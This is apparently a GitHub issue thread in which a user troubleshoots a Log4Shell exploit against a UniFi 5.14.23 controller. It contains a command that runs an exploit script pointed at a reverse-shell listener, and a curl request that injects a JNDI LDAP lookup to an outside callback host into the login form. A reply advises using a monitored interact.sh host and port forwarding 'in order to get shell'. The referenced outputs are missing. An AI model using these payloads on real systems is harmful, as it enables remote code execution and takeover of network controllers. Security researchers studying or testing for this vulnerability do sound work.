Open Drjacky opened 11 months ago
Are you sure that if the target is even vulnerable also in the second request replace eb0uvi.dnslog.cn with a IP that you can monitor maybe an interact.sh server and for the first command you need to setup portforwarding in order to get shell
Despite the UniFi version is
5.14.23
, when I run either:python3 exploit.py -u https://unifi.example.com:8443 -i 127.0.0.1 -p 4444
curl -i -s -k -X POST -H $'Host: unifi.example.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://eb0uvi.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://unifi.example.com:8443/manage/account/login'
For the former:
and there is no request on ngrok:
And for the latter: